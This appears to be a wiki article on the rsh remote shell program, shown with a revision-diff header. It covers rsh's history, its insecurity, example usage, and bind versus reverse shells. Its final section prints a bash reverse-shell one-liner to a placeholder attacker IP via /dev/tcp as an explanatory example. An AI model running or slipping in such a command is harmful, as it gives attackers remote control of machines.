Remote Shell: Difference between revisions
imported>Ohnoitsjamie spam |
imported>Citation bot Added date. | Use this bot. Report bugs. | Suggested by Dominic3203 | Category:Internet protocols | #UCB_Category 39/248 |
||
| Line 30: | Line 30: | ||
The <code>rsh</code> command has the same name as another common UNIX utility, the [[restricted shell]], which first appeared in [[PWB/UNIX]]; in [[System V|System V Release 4]], the restricted shell is often located at <code>/usr/bin/rsh</code>. | The <code>rsh</code> command has the same name as another common UNIX utility, the [[restricted shell]], which first appeared in [[PWB/UNIX]]; in [[System V|System V Release 4]], the restricted shell is often located at <code>/usr/bin/rsh</code>. | ||
As other [[Berkeley r-commands#Security|Berkeley r-commands]] which involve user authentication, the rsh [[communication protocol|protocol]] is not [[computer security|secure]] for network use, because it sends [[cryptography|unencrypted information]] over the network, among other reasons. Some implementations also [[authentication|authenticate]] by sending unencrypted [[password]]s over the network. rsh has largely been replaced with the [[Secure Shell|secure shell]] (ssh) program, even on local networks.<ref>{{Cite web |title=SSH, the Secure Shell: The Definitive Guide |url=https://www.researchgate.net/publication/234765974 |access-date=2023-11-11 |work=www.researchgate.net |archive-date=2023-11-11 |archive-url=https://web.archive.org/web/20231111073413/https://www.researchgate.net/publication/234765974_SSH_the_Secure_Shell_The_Definitive_Guide |url-status=live }}</ref><ref>{{Cite web |title=Secure Shell Protocol – Everything you need to know |url=https://dev.to/me_jessicahowe/secure-shell-protocol-everything-you-need-to-know-5g5j |access-date=2023-11-11 |work=dev.to}}</ref> | As other [[Berkeley r-commands#Security|Berkeley r-commands]] which involve user authentication, the rsh [[communication protocol|protocol]] is not [[computer security|secure]] for network use, because it sends [[cryptography|unencrypted information]] over the network, among other reasons. Some implementations also [[authentication|authenticate]] by sending unencrypted [[password]]s over the network. rsh has largely been replaced with the [[Secure Shell|secure shell]] (ssh) program, even on local networks.<ref>{{Cite web |title=SSH, the Secure Shell: The Definitive Guide |url=https://www.researchgate.net/publication/234765974 |access-date=2023-11-11 |work=www.researchgate.net |archive-date=2023-11-11 |archive-url=https://web.archive.org/web/20231111073413/https://www.researchgate.net/publication/234765974_SSH_the_Secure_Shell_The_Definitive_Guide |url-status=live }}</ref><ref>{{Cite web |title=Secure Shell Protocol – Everything you need to know |url=https://dev.to/me_jessicahowe/secure-shell-protocol-everything-you-need-to-know-5g5j |access-date=2023-11-11 |work=dev.to|date=28 November 2022 }}</ref> | ||
==Example== | ==Example== | ||
| Line 49: | Line 49: | ||
== Bind shell and reverse shell == | == Bind shell and reverse shell == | ||
{{See also|Shell shoveling}} | {{See also|Shell shoveling}} | ||
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).<ref>{{Cite web|title=Secure Shell (SSH)|url=https://www.techtarget.com/searchsecurity/definition/Secure-Shell|access-date=2023-11-11|work=www.techtarget.com|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073413/https://www.techtarget.com/searchsecurity/definition/Secure-Shell|url-status=live}}</ref> In the first case remote shell will be called bind shell, in the second case - reverse shell.<ref>{{Cite web|title=Difference Between Bind Shell and Reverse Shell|url=https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|access-date=2023-11-11|work=www.geeksforgeeks.org|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073414/https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|url-status=live}}</ref> | A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).<ref>{{Cite web|title=Secure Shell (SSH)|url=https://www.techtarget.com/searchsecurity/definition/Secure-Shell|access-date=2023-11-11|work=www.techtarget.com|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073413/https://www.techtarget.com/searchsecurity/definition/Secure-Shell|url-status=live}}</ref> In the first case remote shell will be called bind shell, in the second case - reverse shell.<ref>{{Cite web|title=Difference Between Bind Shell and Reverse Shell|url=https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|access-date=2023-11-11|work=www.geeksforgeeks.org|date=14 December 2021 |archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073414/https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|url-status=live}}</ref> | ||
Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:<ref>{{Cite web |title=What is a Reverse Shell? |url=https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |access-date=2023-11-28 |website=Sysdig |language=en-US |archive-date=2023-11-28 |archive-url=https://web.archive.org/web/20231128061929/https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |url-status=live }}</ref> | Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:<ref>{{Cite web |title=What is a Reverse Shell? |url=https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |access-date=2023-11-28 |website=Sysdig |language=en-US |archive-date=2023-11-28 |archive-url=https://web.archive.org/web/20231128061929/https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |url-status=live }}</ref> | ||
Latest revision as of 07:19, 25 June 2025
Template:Short description Template:Refimprove Script error: No such module "Infobox".Template:Template otherScript error: No such module "Check for unknown parameters".Template:Main other
The remote shell (rsh) is a command-line computer program that can execute shell commands as another user, and on another computer across a computer network.
The remote system to which rsh connects runs the rsh daemon (rshd). The daemon typically uses the well-known Transmission Control Protocol (TCP) port number 513.
History
Script error: No such module "Labelled list hatnote".
Rsh originated as part of the BSD Unix operating system, along with rcp, as part of the rlogin package on 4.2BSD in 1983. rsh has since been ported to other operating systems.
The rsh command has the same name as another common UNIX utility, the restricted shell, which first appeared in PWB/UNIX; in System V Release 4, the restricted shell is often located at /usr/bin/rsh.
As other Berkeley r-commands which involve user authentication, the rsh protocol is not secure for network use, because it sends unencrypted information over the network, among other reasons. Some implementations also authenticate by sending unencrypted passwords over the network. rsh has largely been replaced with the secure shell (ssh) program, even on local networks.[1][2]
Example
As an example of rsh use, the following executes the command mkdir testdir as user remoteuser on the computer host.example.com running a UNIX-like system:
$ rsh -l remoteuser host.example.com "mkdir testdir"
After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system using rlogin. The network location of the remote computer is looked up using the Domain Name System.
Installation
Command to install rsh client using apt
# apt-get install rsh-redone-client
Bind shell and reverse shell
Script error: No such module "Labelled list hatnote". A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).[3] In the first case remote shell will be called bind shell, in the second case - reverse shell.[4]
Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:[5]
$ exec 5<>/dev/tcp/<attacker_IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; done
It opens a TCP socket to attacker IP at port 80 as a file descriptor. It then repeatedly read lines from the socket and run the line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.